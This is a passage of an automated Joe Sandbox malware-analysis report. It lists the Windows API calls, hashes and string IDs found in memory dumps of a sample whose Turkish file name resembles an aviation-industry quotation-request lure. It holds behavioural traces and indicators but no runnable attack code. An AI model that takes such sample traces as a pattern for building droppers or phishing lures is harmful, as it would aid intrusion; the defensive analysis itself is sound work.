                                                                                                                                    • Instruction Fuzzy Hash: 4751E570900648AFDB21CFA8DC85BEEBBFAEF09301F14411AF555E7291D7309A51CB60
                                                                                                                                    APIs
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001A2D4B
                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 001A2D53
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001A2DE1
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 001A2E0C
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001A2E61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                    • Opcode ID: 90f614e840640fe9ea72a32003b78d5f9377bdb5872381b0d8e28feec9bb057a
                                                                                                                                    • Instruction ID: b51b636a5903340e6a19da6ef17a1f9b0c134e37089a785071205b5eeaf733d7
                                                                                                                                    • Opcode Fuzzy Hash: 90f614e840640fe9ea72a32003b78d5f9377bdb5872381b0d8e28feec9bb057a
                                                                                                                                    • Instruction Fuzzy Hash: C841B238A00209ABCF14DFACC885A9EBBB5BF46324F148155F8146B393D735EA15CB90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0020304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
                                                                                                                                      • Part of subcall function 0020304E: _wcslen.LIBCMT ref: 0020309B
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00201112
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201121
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 002011C9
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 002011F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2675159561-0
                                                                                                                                    • Opcode ID: 3923b8afa645ad1805ae80523cbcf1d7645435b0a4ce56a3093cc643a6c05bc3
                                                                                                                                    • Instruction ID: dbaf270c243bc90dbdb75b07b8e8a5128308f6f476e29ee3d1fafd6fba23c599
                                                                                                                                    • Opcode Fuzzy Hash: 3923b8afa645ad1805ae80523cbcf1d7645435b0a4ce56a3093cc643a6c05bc3
                                                                                                                                    • Instruction Fuzzy Hash: F141E435610205AFDB149F14D884BAAF7E9EF45324F248059F9199B2D2CB70EE51CBE0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ECF22,?), ref: 001EDDFD
                                                                                                                                      • Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ECF22,?), ref: 001EDE16
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001ECF45
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001ECF7F
                                                                                                                                    • _wcslen.LIBCMT ref: 001ED005
                                                                                                                                    • _wcslen.LIBCMT ref: 001ED01B
                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 001ED061
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                    • Opcode ID: 498094c31e6219ab9c64cb98bbaf91c742b8b83aaecc8f74f45d32de731311d3
                                                                                                                                    • Instruction ID: 9d1116488bc65c24f7e7aa2f8ccc5cb8b00d073355186deae2cd2f972b20fb94
                                                                                                                                    • Opcode Fuzzy Hash: 498094c31e6219ab9c64cb98bbaf91c742b8b83aaecc8f74f45d32de731311d3
                                                                                                                                    • Instruction Fuzzy Hash: A241947584525C9FDF12EBA4DD81ADEB7B8AF18380F1000E6E505EB142EB34AB89CB50
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00212E1C
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00212E4F
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00212E84
                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00212EB6
                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00212EE0
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00212EF1
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00212F0B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                    • Opcode ID: 1c546561cc86b49a0be8d1f4d380afd98630e39542013e3362b66d782b9077d8
                                                                                                                                    • Instruction ID: c449b868a78b4a0a09fd7a1963a3a5623ec25e3d358a6702dee945a739ebcf74
                                                                                                                                    • Opcode Fuzzy Hash: 1c546561cc86b49a0be8d1f4d380afd98630e39542013e3362b66d782b9077d8
                                                                                                                                    • Instruction Fuzzy Hash: 2C311234654251EFDB218F18EC88FA537E5EBAA711F244164F9109B2B2CB71FCA49B40
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7769
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E778F
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001E7792
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 001E77B0
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 001E77B9
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001E77DE
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 001E77EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                    • Opcode ID: d7728b44bd7aeb96d67070a59d3f2dd80d1be4598aa04be935d9fa9806bf4873
                                                                                                                                    • Instruction ID: 756f8287e841b5f294cacad9bfd3d7606ca10f55aab3c615d8ef0eddd23c0060
                                                                                                                                    • Opcode Fuzzy Hash: d7728b44bd7aeb96d67070a59d3f2dd80d1be4598aa04be935d9fa9806bf4873
                                                                                                                                    • Instruction Fuzzy Hash: 1121947AA08219AFEB10AFA9DC8CCFF73ACEB093647148025B904DB190D7709C818760
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7842
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001E7868
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001E786B
                                                                                                                                    • SysAllocString.OLEAUT32 ref: 001E788C
                                                                                                                                    • SysFreeString.OLEAUT32 ref: 001E7895
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001E78AF
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 001E78BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                    • Opcode ID: 634e94cb6d9cf015b26a5c180839459a09a5dffb1dcf99e0ed440ccc798f573c
                                                                                                                                    • Instruction ID: a55cf13529896fa6e1320defbea2abb578bc5449732acb9c2ee86055cf2e8084
                                                                                                                                    • Opcode Fuzzy Hash: 634e94cb6d9cf015b26a5c180839459a09a5dffb1dcf99e0ed440ccc798f573c
                                                                                                                                    • Instruction Fuzzy Hash: A321BD35608214BFEB14AFA9DC8CDAE77ECEB283607208025F915CB2A0DB70DC41CB64
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 001F04F2
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001F052E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                    • Opcode ID: caff43b2bd8b50747f83dfa6e98e64248ef0cdcae0bab732e26e80a2001a0e91
                                                                                                                                    • Instruction ID: 6775858b2854d2dad1cfb4772ee16fdf7b3a6090250b38d32001a223942a90fd
                                                                                                                                    • Opcode Fuzzy Hash: caff43b2bd8b50747f83dfa6e98e64248ef0cdcae0bab732e26e80a2001a0e91
                                                                                                                                    • Instruction Fuzzy Hash: 5B218D75600309AFDF219F29DC08AAA77A4BF59724F204A19FEA1D72E1D7B0D940CF60
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 001F05C6
                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001F0601
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                    • Opcode ID: f65b4bc0e5feb21d8089e89d31ce811e8c987587667170027e2a72e993f47792
                                                                                                                                    • Instruction ID: 28f439b339ccf1355a06ef0189ef7282b57564c1cb0797da865424b76d33cd66
                                                                                                                                    • Opcode Fuzzy Hash: f65b4bc0e5feb21d8089e89d31ce811e8c987587667170027e2a72e993f47792
                                                                                                                                    • Instruction Fuzzy Hash: 1E21B7755003199FDB219F68DC04AAA77E4BF99730F204A19FEA1D72E1DBB09860CB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0018600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
                                                                                                                                      • Part of subcall function 0018600E: GetStockObject.GDI32(00000011), ref: 00186060
                                                                                                                                      • Part of subcall function 0018600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00214112
                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0021411F
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0021412A
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00214139
                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00214145
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                    • Opcode ID: 551d96f6b0ab5f6d416c5ed69fb717584545e1f02bfbe24ae4d8d9744d0dde68
                                                                                                                                    • Instruction ID: ed1a344892a8d6a60a45510712fa72e1aab4049c0fa63db8ace8f6d3a007bf16
                                                                                                                                    • Opcode Fuzzy Hash: 551d96f6b0ab5f6d416c5ed69fb717584545e1f02bfbe24ae4d8d9744d0dde68
                                                                                                                                    • Instruction Fuzzy Hash: 6511B2B215021ABEEF119F64CC85EE77F9DEF19798F104110BA18A6050CB729C61DBA4
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001BD7A3: _free.LIBCMT ref: 001BD7CC
                                                                                                                                    • _free.LIBCMT ref: 001BD82D
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001BD838
                                                                                                                                    • _free.LIBCMT ref: 001BD843
                                                                                                                                    • _free.LIBCMT ref: 001BD897
                                                                                                                                    • _free.LIBCMT ref: 001BD8A2
                                                                                                                                    • _free.LIBCMT ref: 001BD8AD
                                                                                                                                    • _free.LIBCMT ref: 001BD8B8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                    • Instruction ID: cfbe860d1a3e488eb8047d251e91452b56a922e058cd627b1e906bebb77116e1
                                                                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                    • Instruction Fuzzy Hash: 30112671940B14BADA25BFF0DC46FCB7B9CAF20704F400C25F29DA6092EB75A5098662
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001EDA74
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 001EDA7B
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001EDA91
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 001EDA98
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001EDADC
                                                                                                                                    Strings
                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 001EDAB9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                    • Opcode ID: 2458f14d484986c1e0b58b7a61738241c55655e282f2823f8ab7459664c60113
                                                                                                                                    • Instruction ID: 76866adafe76a3395b96135e8b21f95cf93a77b40ad8bfe718f14e032931b6ce
                                                                                                                                    • Opcode Fuzzy Hash: 2458f14d484986c1e0b58b7a61738241c55655e282f2823f8ab7459664c60113
                                                                                                                                    • Instruction Fuzzy Hash: 180186FA9402487FE7109BA4AD8DEEB736CE718301F5044A2B706E2041EA749E844F75
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(0170E190,0170E190), ref: 001F097B
                                                                                                                                    • EnterCriticalSection.KERNEL32(0170E170,00000000), ref: 001F098D
                                                                                                                                    • TerminateThread.KERNEL32(0170E188,000001F6), ref: 001F099B
                                                                                                                                    • WaitForSingleObject.KERNEL32(0170E188,000003E8), ref: 001F09A9
                                                                                                                                    • CloseHandle.KERNEL32(0170E188), ref: 001F09B8
                                                                                                                                    • InterlockedExchange.KERNEL32(0170E190,000001F6), ref: 001F09C8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(0170E170), ref: 001F09CF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: 11e53eb329eadcf0c7bdbe8b835ff8b2fc143bce37fc22e18036d607d7027ba6
                                                                                                                                    • Instruction ID: 7a9f0c368d0feb405be22d4e3de98d631f703b5026d139988c9f6837496b38b2
                                                                                                                                    • Opcode Fuzzy Hash: 11e53eb329eadcf0c7bdbe8b835ff8b2fc143bce37fc22e18036d607d7027ba6
                                                                                                                                    • Instruction Fuzzy Hash: C1F03135482A12BBD7525F94FE8CBE67B35FF15702F505025F601508A1DB749465CF90
                                                                                                                                    APIs
                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00201DC0
                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00201DE1
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201DF2
                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00201EDB
                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00201E8C
                                                                                                                                      • Part of subcall function 001E39E8: _strlen.LIBCMT ref: 001E39F2
                                                                                                                                      • Part of subcall function 00203224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001FEC0C), ref: 00203240
                                                                                                                                    • _strlen.LIBCMT ref: 00201F35
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                    • Opcode ID: 37cbc6c87f93bcce17a9f7978890130130ab5909b49bfb604051525529e8e395
